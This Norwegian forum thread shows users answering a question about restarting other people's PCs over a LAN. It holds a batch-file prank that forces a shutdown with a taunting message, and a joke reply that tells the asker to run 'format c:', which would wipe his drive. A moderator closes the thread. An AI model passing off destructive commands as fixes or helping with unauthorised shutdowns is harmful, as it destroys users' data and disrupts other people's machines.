djwawa Skrevet 29. januar 2006 Del Skrevet 29. januar 2006 Hvordan restarte pc uten at den blir ødelagt på lan? Lenke til kommentar
Maxila Skrevet 29. januar 2006 Del Skrevet 29. januar 2006 du kan sende en bat fil med komandoen shutdown -s -t 0 for eksempel Lenke til kommentar
djwawa Skrevet 29. januar 2006 Forfatter Del Skrevet 29. januar 2006 Kan du lage en mal til dette? Lenke til kommentar
Leet-Pete Skrevet 29. januar 2006 Del Skrevet 29. januar 2006 Jo, det skal jeg si deg. Gjør følgende: Trykk på 'Start', deretter 'Kjør/run'. Skriv inn "cmd". Skriv inn "format c:", deretter "y", og enter. Så er det bare å vente en stund. Når det er ferdig, funker det som bare det! Da er du kvitt problemet! Så kan du restarte maskina! Jeg hadde samme problemet tidligere også. Etter at jeg gjorde dette, funka det fett! Lenke til kommentar
djwawa Skrevet 29. januar 2006 Forfatter Del Skrevet 29. januar 2006 woot?! det var ikke dette jeg spurte om!! Lenke til kommentar
djwawa Skrevet 29. januar 2006 Forfatter Del Skrevet 29. januar 2006 edit: restarte andres pc Lenke til kommentar
Maxila Skrevet 29. januar 2006 Del Skrevet 29. januar 2006 (endret) ja åpne notisboka, skriv komandoen, lagre som for eksempel hey.bat skriv komandoen shutdown -s -t 0 ,der 0 er sekunder før den slår seg av eller så kan du prøve denne komandoen echo off color 0a cls echo. echo. echo Skriv tekst her echo. echo. echo Vennligst trykk en tast for A fortsette echo. echo. pause cls shutdown -s -t 20 -c "HAHAHAHA, du ble lurt!"shut (fant det over på en eller annen side) finnes også en side over andre forskjellige komandoer http://www.computerhope.com/msdos.htm edit: glemte å si at du kan bruke komandoen shutdown -a for å stoppe avslutningen av datan vis ikke stilt på 0 sekunder Endret 29. januar 2006 av MAXILA Lenke til kommentar
Leet-Pete Skrevet 29. januar 2006 Del Skrevet 29. januar 2006 woot?!det var ikke dette jeg spurte om!! 5515208[/snapback] Joda, joda! Du må gjøre dette for at du skal kunne restarte andres maskiner. Etter det, si ifra, så kan jeg gi deg nye instrukser. Lenke til kommentar
Rikky Skrevet 29. januar 2006 Del Skrevet 29. januar 2006 Hvordan restarte pc uten at den blir ødelagt på lan? 5515188[/snapback] Det er jo ikke verre enn å trykke på reset-knappen. Uansett så er det fryktelig irriterende med morroklumper som skal gjøre ting med andres maskiner uten tillatelse, så jeg tror vi stenger denne først som sist. Lenke til kommentar
Anbefalte innlegg